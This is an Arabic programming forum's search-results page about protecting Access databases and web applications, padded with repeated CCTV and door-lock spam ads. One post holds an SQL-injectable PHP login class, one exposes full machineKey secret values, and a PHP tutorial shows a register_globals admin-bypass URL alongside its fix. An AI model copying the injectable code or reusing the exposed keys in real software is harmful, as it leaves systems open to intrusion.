• الإعلانات

    • فيصل الحربي

      تسجيل عضوية جديدة في المنتدى   01/31/2016

      السلام عليكم ورحمة الله وبركاته  عزيزي العضو الجديد :  حاليا رسالة الإيميل لتأكيد صحة إيميلكم تذهب للبريد العشوائي ( جاري حل المشكلة )  فإذا لم تجد رسالة التحقق من إيميلكم في صندوق الوارد لديكم إتجه للبريد العشوائي ( JUNK)  وقم بتفعيل إشتراككم من هناك   

البحث في المنتدى

Showing results for tags 'حماية - مذربورد'.

  • البحث بالتاقات

    اكتب الكلمات المفتاحيه بينها علامه الفاصله
  • البحث بكاتب الموضوع

تم إيجاد 25 نتيجة

  1. السلام عليكم اخواتى فى المنتدى اتشرف بان اكون عضو بهذا السرح العظيم  لى سؤال انا شايف شروحات كثير عن طريق حماية قاعدة البيانات برقم الهارد دسك او برقم المزبورد ومش فاهم اعمل ايه ولا ابداء اذى وهى الطريقه لى احمى بيها قاعدة البانات الخاصى بى والافضل ايه برقم الهارد ولا المزبورد واضع الكود البرمجى فين فى البرنامج واضع رقم النسخة ولا رقم التشغيل اقسم بالله ما فاهم ممكن حد يسعدنى على اى قاعدة بيانات فارغة لى يهمنى اضع الكود فين والطريقة ازاى وشكرا لكم 
  2. السلام عليكم ورحمة الله وبركاته كل التحية والتقدير لكم جميع أعضاء المنتدى العظيم طرحي هو عملية حماية ملف اكسس وقد استفدت من المنتدى الكثير واخص بالذكر استاذتنا زهرة (ام عهود) لها كل  التحية والتقدير وقد استفدت ان الحماية بخطوات كالتالي: 1- إخفاء الجداول والاستعلامات وهي يمكن اظهارها من خارج قاعدة البيانات بالتالي يجب تشفيرها. 2- الغاء تفعيل مفتاح الشيفت Shift  ويممكن تجاوز ذلك من خارج قاعدة البيانات. 3- عمل كلمة سر للكود كاملا في قاعدة البيانات ، وكذلك يوجد برامج لتجاوز كلمة السر للكود. 4- عمل اسم مستخدم وكلمة مرور ويمكن اين يكون اكثر من مستخدم بصلاحيات خاصة او شاملة يكون في اول فورم يتم تحميله ويكون منبثق ومشروط. 5- إخفاء لوحة التنقل Navigation Pane التي تحتوي مكونات قاعدة البيانات واخفاء الأشرطة التي تمكن الوصول الى لوحة التنقل Ribon وبما في ذلك إخفاء قائمة (ملف) التي تكون ابتداء من اكسس 2010 . 6- تحويل ملف قاعدة البيانات الى ملف accde او accdr . 7- عمل فورم ابتدائي لتسجيل البرنامج على الجهاز مثل رقم الهارد كما تفضل احد الزملاء ويمكن التسجيل برقم اللوحة الام ورقم البيوس والاشتقاق منها معادلة معينة ثابتة تكون رقم تسجيل لأول مرة على الجهاز. 8- إخفاء شاشة الاكسس الخلفية في اول فورم خاصة. ويشرفني ان تشاركوني بآرائكم ، وأتمنى من اتشرف بمشاركة استاذتنا زهرة (ام عهود) وبقية الخبراء في المنتدى بما ذكرت في النقاط السابقة وبما سوف استفسر وأسأل عنه  تالياً: - اعتقد ان موضوع تجاوز حماية الشيفت هو المحور الأساس فهل عند التحويل الملف الى accdr أيضا يتم تجاوز الشيفت وكذلك اذا اجتمعت الحمايات التي ذكرتها سابقا في ثمانية نقاط هل تضعف فعالية اختراق الشيفت بنسبة كبيرة جدا. - وما هي نسبة الاختراق للقاعدة وهل يتم الاعتماد عليها كحماية شبه تامة. - كما وارجو توضيح موضوع تشفير البيانات في الجداول والاستعلامات . ولكم كل الشكر والتقدير اخوكم عبدالله بشير
  3. السلام عليكم  اخواني طلب بسيط كيف يمكن عمل حماية لسجل معين حسب اختياري للسجل ، وعند طلب التعديل يكون محمي بكلمة سير في المثال المرفق : وضعت خانة " اختيار" اسمها حماية عند الضغط عليها يتم حماية السجل مع جميع بياناته فقط ، وعند التعديل نضغط على نفس الخانة " اختيار" لازالة الاشارة من اجل التعديل يطلب منا ادخال كلمة سر من اجل التعديل . وبارك الله بكم  حماية سجل معين.rar
  4. توريد وتركيب جميع انواع كاميرات المراقبة شركة كينج الهندسية للانظمة الامنية تقدم افضل عروضها فى بيع وتركيب كاميرات المراقبة والتي يمكن من خلالها  المراقبة عن بعد من اى دولة فى العالم بكل سهولة عن طريق كاميرات IP أو كاميرات CCTV سواء كانت )مراقبة المنزل– مراقبة المتجر – مراقبة المكتب – مراقبة المدرسة – مراقبة الشركة – مراقبة المصنع  ( توريد وتركيب كاميرات المراقبة الكوريه والامريكية والاوروبيه والالمانى والصينى BTZ/ CCTV / IP / HD داخلية - خارجية - ليلية - نهارية - ثابتة - متحركة تتحمل العوامل الجوية المختلفه - عالية الدقة - امكانية الزووم التلقائية - فيديو صوت وصورة * توريد وتركيب اجهزة التسجيل DVR/NVR 4 مداخل / 8 مداخل / 16 مدخل / 32 مدخل اسعارنا  مميزة وفى متناول الجميع ·        توريد وتركيب وبرمجة ·        ضمان عام شامل لمده عام ·        يوجد لدينا عقود صيانة للانظمة القديمة الماركات المتاحه Hikvision / FINE تيوانى  /  HUVIRON IP  /  Zavio  /  dahua IP  /  HANBANG / Analog / Turbo HD / FINE  PTZ /  FINE  / Dahua /  DIPEL /  GRUNDIG ANALOGUE /  GRUNDIG HD-SDI /  GRUNDIG IP/  HUVIRON ANALOG /  HDCVI CAMERA / كاميراتكورى / ECOTECH /كاميراتتيوانى / Alfa /  HANBANG / HDPLUS / HDPRO / TMain/HERO TECHL /CCTV AVTECH [url=https://www.0zz0.com][/url] [url=https://www.0zz0.com][/url] [url=https://www.0zz0.com][/url] [url=https://www.0zz0.com][/url] [url=https://www.0zz0.com][/url] للأستفسار موبايل:01007773521 - 01007771327 01000127629 - 01143100053 – 01020002971   العنوان :10 الشطر العاشر بجوار كارفور المعادي القاهرة   Email:[email protected] Website: http://www.ksedco.com YouTube:https://www.youtube.com/channel/UC4uDtUd2oRuSum3ChmMBeTw Facebook: https://www.facebook.com/ksedco.company https://www.facebook.com/ksedco Google+: https://plus.google.com/100471050354784765950/posts BlogSpot:http://ksedco.blogspot.com/   دمـتـم بخـيـر كلمات دلاليه كاميراتمراقبة , يوتيوب , مخفية ,مراقبة الخادمات ,جودةعالية , ثابتة , متحركة’ تصوير نهارى و ليلى ,  داخلية وخارجية , كاميرات يبانى , كورى ’ المانى , جودة عالية ’ اسعار الكاميرات , امريكى ،سونى , سامسونج , زوم , تكبير , عالية الجودة , صينى ’ اسعار رخيصة , تركي , برمجة , كاميرا قلم , صغيرة , معدن , ضد الماء , ضد العوامل الجوية  , دووم , لا سلكية , ذكيةتنقلالتفاصيل , مشاهدة عبر الهاتف , عن بعد , اجهزة تسجيل , امن , حماية , احمى منشاتك , شركة ’ منزل , تسجيل , بحجمالعين 900 tvl ,1mp , 2mp , 3mp , 5mp , IR , HD ,analog camera , IP Camera , PTZ , Small , day and night , Hikvision , Metal Cameras , outdoor , indoor ,Dome , bullet , wireless , housing , Vandal proof , sony , zoom ,  FINE , Zktech , DVR , NVR , Recording , HANBANG القاهرة - الجيزة - القليوبية الإسكندرية - البحيرة - مطروح الدقهلية - كفر الشيخ - الغربية - المنوفية - دمياط بورسعيد - الإسماعيلية - السويس - الشرقية - شمال سيناء - جنوب سيناء بني سويف - المنيا - الفيوم أسيوط - الوادي الجديد سوهاج - قنا - الأقصر - أسوان - البحر الأحمر Cairo - Giza - Qalyubia Alexandria - Bahrin - Matrouh Dakahlia - Kafr el-Sheikh - Gharbiya - Monoufia - Damietta Port Said - Ismailia - Suez - Alsharkia‏ - North Sinai - South Sinai Beni Suef - Minia - Fayoum Assiut - Wady gaded Sohag - Qena - Luxor - Aswan – Sharm El-Sheikh, Hurgada, Ain El-Sokhna - Red Sea  
  5. حماية البرامج من النقل الى جهاز اخر عن طريق SerialNumber الهارد  حماية البرنامج من النسخ او النقل الى جهاز اخر عن طريق سريال الهارد  منع البرامج من العمل على جاهز اخر عن طريق SerialNumber للهارد  رابط الملف المستخدم على صفحة اليوتيوب https://www.youtube.com/watch?v=wOFP6CElT1s  
  6.  كينج الهندسية المتخصصة فى الانظمة الأمنية تقدم كالون الفنادق   - يمكنك الان التحكم فى الابواب للمنازل والفنادق والمكاتب  عن طريق البصمه او الكارت او الكود السرى   - الجهاز يمكن برمجته بحيث انه يسمح للعاملين بالدخول والخروج فى اوقات معينه وخلال فترات معينه او طول العام   - النظام مناسب للاحساس بالامان داخل منزلك او شركتك او فندقك  - كما انه يمكنك ربط اكثر من باب معا والتحكم بهم عن طريق السوفت وير - سعه تخزين 1000 مستخدم  - بطاريه تدوم 3 سنوات تنبيه قبل نفاذ البطاريات  بايام  - سحب البيانات عن طريق الفلاش او الUSB -        جهاز برمجة الكروت على الابواب (Encoder)         • توريد وتركيب وبرمجة • ضمان عام شامل لمده عام • يوجد لدينا عقود صيانة للانظمة القديمة الموديلات المتاحة LH1000  , LH4000 , PL10 , L7000S , L5000 , FL1000 , SHS-H705 , SHS-5120XMK/EN , SHS-2320XMK/EN , SHS-3320XMK/EN , SHS-P717 , SHS-P718 , SHS-G517 , الماركات المتاحة  SAMSUNG-  ZKTECO [url=http://www.qqq4.com/][/url] [url=http://www.qqq4.com/][/url]       موبايل 01000127629 - 01143100053 – 01020002971 01007773521     العنوان :10 الشطر العاشر بجوار كارفور المعادي القاهرة       Website : http://www.ksedco.com     YouTube:https://www.youtube.com/channel/UC4uDtUd2oRuSum3ChmMBeTw     Facebook: https://www.facebook.com/ksedco.company https://www.facebook.com/ksedco     Google+: https://plus.google.com/100471050354784765950/posts     BlogSpot: http://ksedco.blogspot.com/                                           
  7. توريد وتركيب جميع انواع كاميرات المراقبة شركة كينج الهندسية المتخصصة فى بيع وتركيب كاميرات المراقبة فى مصر الان يمكنك مراقبة المنزل – مراقبة المتجر – مراقبة المكتب – مراقبة المدرسة – مراقبة الشركة – مراقبة المصنع  بكل سهولة ويسر ومع العديد من الامكانيات الت ىتتمناها امكانية المراقبة عن بعد من اى دولة فى العالم توريد وتركيب كاميرات المراقبة الكوريه والامريكية والاوروبيه والالمانى والصينى BTZ/ CCTV / IP / HD داخلية - خارجية - ليلية - نهارية - ثابتة - متحركة تتحمل العوامل الجوية المختلفه - عالية الدقة - امكانية الزووم التلقائية - فيديو صوت وصورة * توريد وتركيب اجهزة التسجيل DVR/NVR 4 مداخل / 8 مداخل / 16 مدخل / 32 مدخل اسعارنا  رائعة وفى متناول الجميع ·        توريد وتركيب وبرمجة ·        ضمان عام شامل لمده عام ·        يوجد لدينا عقود صيانة للانظمة القديمة الماركات المتاحه Hikvision / FINE تيوانى  /  HUVIRON IP  /  Zavio  /  dahua IP  /  HANBANG / Analog / Turbo HD / FINE  PTZ /  FINE  / Dahua /  DIPEL /  GRUNDIG ANALOGUE /  GRUNDIG HD-SDI /  GRUNDIG IP/  HUVIRON ANALOG /  HDCVI CAMERA / كاميراتكورى / ECOTECH /كاميراتتيوانى / Alfa /  HANBANG / HDPLUS / HDPRO / TMain/HERO TECHL /CCTV AVTECH     شركة كينج الهندسيه للانظمة الامنية المتكاملة للأستفسار   موبايل:01007773521 01000127629 - 01143100053 – 01020002971   العنوان :10 الشطر العاشر بجوار كارفور المعادي القاهرة   Email:[email protected] Website: http://www.ksedco.com YouTube:https://www.youtube.com/channel/UC4uDtUd2oRuSum3ChmMBeTw Facebook: https://www.facebook.com/ksedco.company https://www.facebook.com/ksedco Google+: https://plus.google.com/100471050354784765950/posts   BlogSpot:http://ksedco.blogspot.com/   دمـتـم بخـيـر كلمات دلاليه كاميراتمراقبة , يوتيوب , مخفية ,مراقبة الخادمات ,جودةعالية , ثابتة , متحركة’ تصوير نهارى و ليلى ,  داخلية وخارجية , كاميرات يبانى , كورى ’ المانى , جودة عالية ’ اسعار الكاميرات , امريكى ،سونى , سامسونج , زوم , تكبير , عالية الجودة , صينى ’ اسعار رخيصة , تركي , برمجة , كاميرا قلم , صغيرة , معدن , ضد الماء , ضد العوامل الجوية  , دووم , لا سلكية , ذكيةتنقلالتفاصيل , مشاهدة عبر الهاتف , عن بعد , اجهزة تسجيل , امن , حماية , احمى منشاتك , شركة ’ منزل , تسجيل , بحجمالعين 900 tvl ,1mp , 2mp , 3mp , 5mp , IR , HD ,analog camera , IP Camera , PTZ , Small , day and night , Hikvision , Metal Cameras , outdoor , indoor ,Dome , bullet , wireless , housing , Vandal proof , sony , zoom ,  FINE , Zktech , DVR , NVR , Recording , HANBANG [url=https://www.0zz0.com][/url] [url=https://www.0zz0.com][/url] [url=https://www.0zz0.com][/url] [url=https://www.0zz0.com][/url] [url=https://www.0zz0.com][/url]
  8. كينج الهندسية المتخصصة فى الانظمة الامنية تقدم افضل واحدث أجهزة بوابات انذار لمحلات الملابس للحماية من السرقة - كـسرقة الملابس من المحلات ، المولات التجارية، ويتوافر ايضا كافة الاكسسوارات الخاصة بالنظام . بوابة ملابس ماركة  EAS و ماركة cross point  الهولاندية - ذات 2 ذراع لمحلات الملابس عالية الحساسية - تمتاز بالشكل المميز والجذاب  بها ليدات  اضائة اثناء الانذار يمكن تشغيلها على labelبدل التاج او الاثنين معا . ولدينا جميع ملحقات البوابات: التاج مربع كبير- التاج مربع صغير - التاج الجولف الصغير - التاج الجولف الكبير - فكاكة تاج عادى - فكاكة تاج جولف - ليبٌل او باركود - جهاز حرق الباركود •توريد وتركيب وبرمجة •ضمان عام شامل لمده عام •يوجد لدينا عقود صيانة للانظمة القديمة     الماركات المتاحة cross point , EAS [url=http://www.qqq4.com/][/url] [url=http://www.qqq4.com/][/url] [url=http://www.qqq4.com/][/url] شركة كينج الهندسيه للانظمة الامنية المتكاملة للأستفسار موبايل 01000127629 - 01143100053 – 01020002971 01007773521     العنوان :10 الشطر العاشر بجوار كارفور المعادي القاهرة Website: http://www.ksedco.com YouTube:https://www.youtube.com/channel/UC4uDtUd2oRuSum3ChmMBeTw Facebook: https://www.facebook.com/ksedco.company  https://www.facebook.com/ksedco Google+: https://plus.google.com/100471050354784765950/posts BlogSpot:http://ksedco.blogspot.com/     دمـتـم بخـيـر كلمات دلاليه :        
  9. السلام عليكم ورحمة الله وبركاته  سؤالي حول حماية ملف الاكسيس من النشر او التوزيع (اي ربطه بجهاز) سواء كان بالهاردسك او المعالج 1- بعد اخد رقم الهاردسك كيف يتم ربطه بملف الاكسيس 2- كيف لي ان افتح نفس الملف برقم خاص لجميع الاجهزة "خاص بالمبرمج"  
  10. السلام عليكم جميعا تحياتى لسيادتكم واخص استاذتى ومعلمتى ا/ زهرة لاننى قدتعلمت من مشاريعها الكثر والكثر وعرفانا بالجميل انى اتقدم اليها بالتحية  وبعد لدى قاعدة بيانات قمت باعداها وحميتها بكلمة مرور وبعد فترة احتجت اليها والمفاجاءة انى  نسيت كلمة المرور وانا فى الاحتياج اليها  لذا ارجوا المساعدة فى الدخول اليها او استيراد مكوناتها فى قاعدة اخرى  للعلم مصممة على اكسيس 2003 وشكرا
  11. سلام الله عليكم ورحمته وبركاته  لدي استفسار ارجو افادتي  وهو انه بعد تقسيم قاعدة البيانات فان الجزء الذي يحوي الجداول قد يكون معرض للاختراق كيف يمكن حمايته بكلمة سر  وتفتح فقط من النماذج دون الحاجة الى كتابة كلمة السر   وهل يمكن حمايتها من الفتح الخاص (الشفت) 
  12. السلام عليكم سؤالى هو الى اى درجة وصلت عملية الحماية للداتا المحفوظة داخل قاعدة البيانات؟ هل يمكننى تشفير كل شئ يمكن حفظه بقاعدة البيانات ؟ وعند استدعائه يظهر النصوص طبيعية؟ على سبيل المثال فى نقطة كلمة المرور تشفير كلمة المرور في ASP.NET Membership يمكن ذلك من خلال الويب كونفيج من خلال في وسم membership في ملف web.config في خاصية passwordFormat اجعل القيمة Encrypted <membership defaultprovider="DefaultMembershipProvider"> <providers> <add passwordformat="Encrypted" تحديد نوع التشفير ، ومفتاح التشفير ويمكن ذلك عبر إضافة الوسم التالي أيضا في الويب كونفيج <system.web> <machineKey validationKey="1E972B83C592446B9CAEFCD34E951882660CE607F10C0226DFC02B8F86E6289BEED8436DE17155B1200B4121A7DE67EA721F4CF5407505A8EB79DF87BAFE9456" decryptionKey="82E9E5F7366F8AAFBE5CC61545272EFD7ABBC49F2FC575A142B164F485775CE5" validation="SHA1" decryption="AES" /> ارجو الرد
  13. السلام عليكم و رحمة الله   كبف أحمي نفسي من ثغرة sql في هذا الكلاس <?phpsession_start();class mysql{ private $localhost="localhost"; private $db_user="root"; private $db_password="vertrigo"; private $db_name="sql"; function __construct(){ $connect=mysql_connect($this->localhost,$this->db_user,$this->db_password); mysql_select_db($this->db_name); } function sql(){ $username=$_POST['username']; $password=$_POST['password']; mysql_real_escape_string($username); mysql_real_escape_string($password); $sql="SELECT * FROM members WHERE name='$username' AND password='$password'";$query=mysql_query($sql);$num=mysql_num_rows($query);if ($num==1){ $_SESSION['username']="username"; $_SESSION['password']="password"; header("location:admin/admin.php"); } else{ echo"اسم المستخدم أو الباسوورد خاطأ"; } } } $use=new mysql;$use->sql();?>check.php login.php
  14. بسم الله والصلاة والسلام على رسول الله وعلى اله وصحبه اجمعين.. السلام عليكم ورحمة الله وبركاته هذه اول مشاركة لي في المنتدى واتمنى ان يعينني الله على نشر العلم بين صفوف المسلمين واتمنى ان اكون ضيفا خفيفا عليكم...   وبعد هذه المقدمة الطويلة نوعا ما نبدأ على بركة الله.. موضوعنا اليوم هو عن برنامج Fortify on Demand او ما يعرف  FOD  التابع لشركة HP  العملاقة. وهو برنامج يقوم بفحص الثغرات الامنية في برمجيات الويب بصورة مميزة وعملاقة.. كما وان البرنامج لا يحتاج الى تحميل فهو تطبيق ويب يسهل استخدامه وله العديد من المزايا وخاصة انه "مجاااااااااااااااااااااني"..   والان اترككم اخواني مع الشرح         تحياتي
  15. السلام عليكم  B) اريد من احد ان يقوم بكسر الحماية على هذا المثال الذي اجريته وبحال النجاح اخبرني بالمدة التي قضيتها كم يوم ( هذا بحال النجاح طبعا )  :lol: وطبعا ارجوا اخباري بالمدة التي قيضتها ولم تفلح بمعنى لو ان لك اسبوع وان تحاول ادخل وقل لي اسبوع ولا زلت احاول  :D وشكرا على التعاون المثمر لنا جميعا     رابط التحميل من هنا   http://www.up-00.com/?5NdK
  16. الأخوة مشرفي واعضاء هذا المنتدى الرائع تابعت كثيرا المواضيع الشيقة المنشورة في منتداكم حول الحماية وطرق اختراقها واخص بالذكر طريقة استخدام الهندسة العكسية واستخدام المفكرة لكسر السريال ((للمحترفين)) واليوم أضع لكم مثال لحماية قوية جدا اتحدى فيها محترفي الهندسة العكسية و..و.... وهو اثبات قوي أن الأكسس يتمتع بحماية قوية لمن يستخدم عقله في الاستفادة من طرق الحماية المتوفرة سوف اشرح لكم الطريقة لاحقا وبالتفصيل بعد تقييم موضوعي فلربما أكون قد أخطأت في شيء ((والكمال لله وحده)) المهم سأرفق لكم جزءا من برنامجي المحاسبي (فقط ما يخص الدخول للوحة الترخيص والنموذج الرئيسي) وهو مغلق تماما كما ستركبه للمستفيد ويطلب منك الترخيص....الخ إلا أن كسر الترخيص هنا سيكون صعبا جدا إن لم يكن مستحيلا   ... وهذا الفرس أمامكم ومنتدانا بالطبع ميدانكم     وفي انتظار ردودكم
  17. الأساتذة الكرام ... السلام عليكم ورحمة الله ... لماذ بعد كل عملية نسخ إحتياطي backup file لملف محمي بكلمة سر يتم إلغاء كلمة السر للملف الجديد  نأمل الإفادة وكيف يتم تفادي المشكلة وعند النسخ الإحتياطي يكون الملف الإحتياطي محمي بكلمة السر ... ملحوظه : الكود من ضمن سلسلة ابداع الاستاذة / زهرة بارك الله فيها .... Option Compare DatabaseOption ExplicitPublic Function Backup()On Error GoTo Error_HandlerDim sFile As String, oDB As DAO.DatabaseDim strCurrentName As StringDim oTD As TableDefDim qDF As QueryDefDim obj As AccessObjectstrCurrentName = Application.CurrentObjectNamesFile = CurrentProject.Path & "\" & Left(CurrentProject.name, Len(CurrentProject.name) - 6) & " " & Format(date, "dd-mm-yyyy") & ".accdb"If Dir(sFile) <> "" Then Kill sFileSet oDB = DBEngine.Workspaces(0).CreateDatabase(sFile, dbLangGeneral)'ÇáÌÏÇæáFor Each oTD In CurrentDb.TableDefsIf Left(oTD.name, 4) <> "MSys" ThenDoCmd.TransferDatabase acExport, "Microsoft Access", sFile, acTable, oTD.name, oTD.name, FalseEnd IfNext oTD'ÇáÇÓÊÚáÇãÇÊFor Each qDF In CurrentDb.QueryDefsIf Left(qDF.name, 1) <> "~" ThenDoCmd.TransferDatabase acExport, "Microsoft Access", sFile, acQuery, qDF.name, qDF.name, FalseEnd IfNext qDF'ÇáäãÇÐÌFor Each obj In CurrentProject.AllFormsDoCmd.TransferDatabase acExport, "Microsoft Access", sFile, acForm, obj.name, obj.name, FalseNext obj'ÇáÊÞÇÑíÑFor Each obj In CurrentProject.AllReportsDoCmd.TransferDatabase acExport, "Microsoft Access", sFile, acReport, obj.name, obj.name, FalseNext obj'ÇáãÇßÑæFor Each obj In CurrentProject.AllMacrosDoCmd.TransferDatabase acExport, "Microsoft Access", sFile, acMacro, obj.name, obj.name, FalseNext obj'ÇáæÍÏÇÊ ÇáäãØíÉFor Each obj In CurrentProject.AllModulesDoCmd.TransferDatabase acExport, "Microsoft Access", sFile, acModule, obj.name, obj.name, FalseNext objMsgBox " ãÈÑæß ... Êã ÇäÔÇÁ äÓÎÉ ÅÍÊíÇØíÉ Ýí äÝÓ ãÌáÏ ÇáÞÇÚÏÉ ÈÊÇÑíÎ Çáíæã ", vbInformation, "BackUp"Error_Handler_Exit:On Error Resume NextSet qDF = NothingSet oTD = NothingSet obj = NothingoDB.CloseExit FunctionError_Handler:MsgBox "The following error has occured." & vbCrLf & vbCrLf & "Error Number: " & Err.Number, vbCritical, "An Error has Occured!"Resume Error_Handler_ExitEnd FunctionFunction RunSub()Call BackupEnd Functionمشكورين مقدماً
  18. السلام عليكم قرأت عن مواضيع الحماية برقم الهارد ولكن هل هنالك حماية برقم المذربورد ( اللوحة الام ) ؟ وما هو كود الوحدة النمطية في هذه الحالة ؟ وما هو كود النموذج راجيا ممن يعرف المساعدة ان يفيدني لانه اخر مرحلة في برنامجي راجيا ان يصبح البرنامج لا يقبل النسخ من كمبيوتر الى اخر رجاءا    
  19. السلام عليكم قرأت عن مواضيع الحماية برقم الهارد ولكن هل هنالك حماية برقم المذربورد ( اللوحة الام ) ؟ وما هو كود الوحدة النمطية في هذه الحالة ؟ وما هو كود النموذج راجيا ممن يعرف المساعدة ان يفيدني لانه اخر مرحلة في برنامجي راجيا ان يكون البرنامج لا يقبل النسخ من كمبيوتر الى اخر رجاءا
  20. الاخوة الكرام   ابحث عن فكرة وهي عند دخول اي مستخدم الى البرنامج يستيطع ان يرى جميع الاسماء وعند الدخول الى بيانات اسم معين تظهر جميع بياناته ما عدا اسماء معينة لا يستطيع الدخول على بياناتها الا بكلمة سر معينة   بمعنى يسمح للمستخدم الاطلاع على جميع الاسماء وبياناتها ما عدا بيانات اسماء معينة اي (تكون هذه الاسماء ظاهرة للكل ولكن لاظهار بياناتها يطلب رقم سري) لاهميتها .   وبارك الله بكم
  21. السلام عليكم اخوتي في الله اريد مساعدتكم الطيبة اريد ان انشئ دورة مدفوعة في موقعي و اريد كل شخص عند تفعيل حسابه في موقعي ان امنعه من تحميل الفيديوهات على جهازه لكي لا ينشرها اذا سامح الله على اليوتيوب او ما شابه و تصبح هذه الدورة بلا قيمة اذا لم يمكن اريد فقط ان اعرف اذا حمل شخص فيديو ان يتم حظر حسابه تلقائيا من الموقع ارجوا منكم الاجابة بشكل واضح لاني مبتدئة بعض الشيء و شكرا لكم
  22. السلام عليكم ورحمة الله وبركاته هذا برنامج صغير صممته وأريد حمايته من التعديل عليه، أو العبث به أثناء العمل، من تصميم وتعديل واضافة وإلى ما آخره. فهل من كودات أو عمليات تحمي الجداول والتقارير والنماذج بالأخص من التعديل عليها أو إضافة حقول جديدة بالرغم من أنني سعيت في هذا المنتدى الكريم، من البحث والاستفادة من طرق الحماية ، كتبديل حرف الباء ( b  ) إلى حرف ( r  ) في امتداد الملف (ملف اكسس 2007). والقيام بالدخول إلى تخصيص واختيار النموذج وإزالة كافة الخياارات من خيارات تعديل وإلى ما شابه من ذلك. إلا أنني أريد بصراحة طريقة أقوى أو حل أفضل لحماية الجداول والتقارير والنماذج من التعديل ولكم جزيل الشكر. A2.zip
  23. السلام عليكم ورحمة الله وبركاته أساتذتي الفضلاء : طلب مني بعض من لا أستطيع رد طلبه .. نسخة من برنامج عملته ... البرنامج يحتوي على قاعدة بيانات sql server  وتقارير كريستال وملفات أخرى .. ليس عندي مشكلة في استفادته من البرنامج أو الملفات ... إلا أن تقاريري وقاعدة بياناتي بها جهد وأفكار خاصة بي ... وما أخافه هو إعادة استخدامها في بريمج جديد مبني على هذه القاعدة ويحتوي هذه التقارير   سؤالي أساتذتي :            كيف يمكنني إعطائه طلبه من دون مجال للخوف  بصيغة أخرى : كيف أجعله لا يستطيع فتح قاعدة البيانات ورؤية أكوادها .. ولا يستطيع رؤية آلية تصميم التقارير .. أريدها أن تعمل مع البرنامج فقط .. ولا يستطيع أن ينسبها لنفسه ... هذا كود فتح التقارير الذي أستخدمه في حدث ضغط زر فتح التقرير con.Open() Dim cmd As New SqlCommand("Select * from count_s", con) Dim dt As New DataSet Dim da = New SqlDataAdapter(cmd) 'dt.Clear() da.Fill(dt, "count_s") Dim rpt As New count_square rpt.Load(Application.StartupPath & "\count_s.rpt") rpt.SetDataSource(dt) Dim newviewre As New count newviewre.CrystalReportViewer1.ReportSource = rpt newviewre.Text = " كشف " newviewre.CrystalReportViewer1.Refresh() newviewre.Show() 'dt.Clear() con.Close()رجاءً لا تبخلوا علي  وفقكم الله وأعانكم
  24. الحماية

    إليكم هذا المرفق و فيه السؤال المطلوب   abdeslem.rar
  25. السلام عليكم و رحمة الله وبركاته . هذا الدرس من سلسلة الدروس التالية لتعلم لغة php . الحماية في تطبيقات php . خاصية Register Globals : في السابق كانت هذه الخاصية تُمكن برنامجك من استخدام متغيرات تحمل نفس اسم الحقول الموجودة في نماذج HTML (في الواقع ليس فقط حقول HTML وانما اي بيانات تُمرر عن طريق GET أو POST والكعكات Cookies) . فلو افترضنا صحفة HTML التالية التي تحوي على مربع نص يحمل الاسم 'name' : <!DOCTYPE html><html> <head> <title>register_globals example</title> </head> <body> <form action="form.php"> <input type="text" name="name"> <br> <input type="submit"> </form> </body></html>فكان بامكانك طباعة قيمة حقل مربع النص السابق مباشرة عن طريق المتغير $name دون الحاجة الى استخدام المصفوفة $_POST أو $_GET , ملف form.php : <?phpecho $name;?>الطريقة السابقة تكون صحيحة عندما تكون قيمة register_globals في ملف php.ini تساوي "on" وتأني هذه الميزة غير مُفعلة افتراضيا ً في php 4.2.0 وتمت ازالتها في اصدار php 5.4 . تشكل ميزة Register Globals أخطار أمنية وخصوصا ً عندما لا نقوم بتهيئة المتغيرات قبل استخدامها كما في المثال التالي : <?phpif($_GET['name'] == 'ahmad' AND $_GET['pass'] == 'pass'){ $admin = true;}if($admin == true){ echo 'welcome Admin';}else{ echo 'you are NOT the admin';}?>وبفرض ان اسم المستخدم وكلمة المرور مُخزنة في قواعد البيانات وليس من السهل معرفتها ; فمن الممكن أن يقوم المهاجم بالوصول الى الصفحة عبر الرابط index.php?admin=1وبسبب ميزة Register Globals فإن قيمة المُتغير $admin ستكون دائما ً true ويحصل بموجبها المهاجم على صلاحيات المدير بكل بساطة ! . ولحل هذه المُشكلة يوجد خياران : الخيار الأول هو تعطيل ميزة Register Globals في ملف php.ini (ومعظم -إن لم يكن جميع- شركات الاستضافة تُعطل هذه الميزة) , وأما الحل الثاني فهو تهيئة جميع المتغيرات قبل استخدامها , فيمكن تهيئة المتغير $admin في المثال السابق للتخلص من هذه المشكلة : <?php$admin = false;if($_GET['name'] == 'ahmad' AND $_GET['pass'] == 'pass'){ $admin = true;}if($admin == true){ echo 'welcome Admin';}else{ echo 'you are NOT the admin';}?> اظهار الأخطاء Error Reporting : لا يمكن اتمام كتابة برنامج ما بسلام دون وقوع أخطاء , فمن المفيد جدا ً للمطور اظهار هذه الأخطاء وتصيحيها ويُفضل عند تطوير برنامج ما أن تُوضع قيمة الراية "error_reporting" مساوية ً للقيمة "E_ALL | E_STRICT" لاظهار جميع الأخطاء بالإضافة الى ملاحظات حول الكود (مثلا ً تظهر رسالة notice عند استخدام متغير لم تقم بتهيئته ... ) , لكن بعد الانتهاء من الموقع وتشغيله على على الخادم بشكل نهائي يجب ايقاف اظهار الاخطاء لأن ذلك قد يكشف بعض تفاصيل الموقع ويعرضه للاختراق (اذكر ان موقع yahoo! الشهير تعرض للاختراق بسبب ذلك) فمن المفيد تغيير قيمة "display_errors" الى القيمة "off" لمنع اظهار الاخطاء في المتصفح ,لكن في حال اردت الاطلاع على الاخطاء في حال وجودها يمكنك تفعيل تسجيل الاخطاء الى ملف عن طريق اسناد القيمة "on" الى الراية "log_errors" وتحديد مسار ملف التسجيل في الراية "error_log" . ويجدر بالذكر أن الرايات "error_reporting" و "display_errors"و"log_errors" بالاضافة الى "error_log" من النوع "PHP_INI_ALL" اي يمكن تحديد قيمتها في ملف php.ini أو ملف "httpd.conf" او ملفات ".htaccess" او حتى في زمن التنفيذ عن طريق الدالة ini_set. التحقق من ادخال المستخدم : القاعدة الشهيرة "لا تثق ابدا ً بمدخلات المستخدم" تنطبق تماما ً على لغة php . فيجب علينا -كمبرمجين- وضع جميع الاحتمالات لمدخلات المستخدم والاستجابة وفقا ً لها . فمثلا ً اذا اردنا من المستخدم تزويد الموقع ببريده الالكتروني فعلى الأقل يجب التحقق من ان طول السلسة النصية لا يساوي الصفر , أما اذا اردنا التحقق من صحة بريده الاكتروني يمكننا ذلك باستخدام التعابير النظامية كما في النمط التالي : /^([a-zA-Z0-9_])[email protected]([a-zA-Z0-9_])+(\.[a-zA-Z0-9_]+)+$/وقد تم شرح ذلك بالتفصيل في درس السلاسل النصية و التعابير النظامية . ثغرات XSS Cross Site Scripting : 